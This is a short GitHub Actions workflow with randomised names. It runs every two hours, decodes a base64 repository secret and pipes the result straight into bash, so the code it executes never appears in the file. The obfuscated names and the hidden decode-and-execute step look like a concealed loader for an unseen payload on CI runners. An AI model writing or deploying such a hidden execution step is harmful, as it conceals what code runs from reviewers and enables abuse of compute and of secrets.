name: xUzribQxOR
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  zoBPyLDAybc:
    runs-on: ubuntu-24.04
    env:
      XDyesd: ${{ secrets.efIstUIRU }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.OWMtBuUdfAdx }}" | base64 -d | bash
